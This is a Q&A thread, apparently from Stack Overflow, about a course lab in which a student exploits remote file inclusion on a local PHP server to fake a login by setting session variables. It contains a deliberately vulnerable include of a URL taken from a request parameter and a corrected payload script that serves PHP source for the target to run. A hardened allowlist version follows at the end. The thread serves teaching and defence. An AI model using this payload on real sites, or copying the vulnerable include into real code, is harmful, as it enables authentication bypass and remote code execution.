
I'm trying to simulate a remote file inclusion attack on my local web server as part of a course I am taking. I got the idea of being able to "log in" on a website I set up without really logging in via the system, rather by just setting the appropriate session variables in a remote script and then including it in the code of my website. Now I got the script to be included and run on my website (I can echo strings etc.), but I cannot seem to set session variables using the remote script. Does anybody have any idea why?

Here is the code of the website so far:

index.php:

<?php session_start(); ?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Document</title>
</head>
<body>
  <?php require("php/imageupload.php"); ?>
  <p>Logged in as: <?php echo $_SESSION['username']; ?></p>
</body>
</html>

imageupload.php:

<?php
  session_start();
  $file = $_GET["file"];
  require($file);
?>

hack.php (remote file):

<?php
  session_start();
  $_SESSION['username'] = "foo";
  echo "test";
?>

When I request http://localhost/index.php?file=http://127.0.0.1/hack.php I get the following response:

test

Logged in as:

1 Answer


The included file is actually executed on your server, not on the vulnerable server when including it (which in this case is the same server, but it's still wrong behavior).

What is included is actually the result of the PHP execution ("test" in this case).

What you want is to return a file that actually contains the code. So you could either transform the hack.php file into hack.txt, or simply adjust the code to echo the desired payload:

<?php
echo '<?php
  session_start();
  $_SESSION[\'username\'] = "foo";
  echo "test";
?>';
  • @Your Common Sense Thanks for your edit suggestion. I didn't use it though, because it doesn't seem relevant to the question; as OP does get a response, `allow_url_include` is already on in their test case. Otherwise, it's important information though; without the setting, inclusion of remote files would indeed not work. – tim Oct 10 '18 at 09:45
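For anyone reusing this lab code outside the course, the other half of the picture is what the fixed version of imageupload.php should look like. The following is an added example, not code from the question or the answer above: it assumes the legitimate includes live under a hypothetical ./includes/ directory and that the only valid values of ?file= are the two keys listed in $allowed.

```php
<?php
// Hardened replacement for the vulnerable imageupload.php (added example,
// not from the original post). Assumes the real includes live in
// ./includes/ (hypothetical path) and are limited to the keys in $allowed.
session_start();

// Map the user-supplied key to a fixed, server-side path. The request value
// is never used as a path or URL, so neither remote ("http://...") nor local
// ("../../etc/passwd") inclusion is possible, whatever php.ini says.
$allowed = [
    'gallery' => __DIR__ . '/includes/gallery.php',
    'upload'  => __DIR__ . '/includes/upload.php',
];

$key = $_GET['file'] ?? '';
if (!is_string($key) || !array_key_exists($key, $allowed)) {
    http_response_code(400);
    exit('unknown include');
}

// Defence in depth: the lab in the question only works because
// allow_url_include is On. The PHP default is Off; complain if it is not.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is enabled; turn it Off in php.ini');
}

require $allowed[$key];
```

The allowlist is the actual fix; the `allow_url_include` check is only a safety net, since it does nothing against local file inclusion of, say, an uploaded image containing PHP. The setting has been Off by default since it was introduced and is deprecated as of PHP 7.4, so a test environment that has it On should be treated as deliberately weakened.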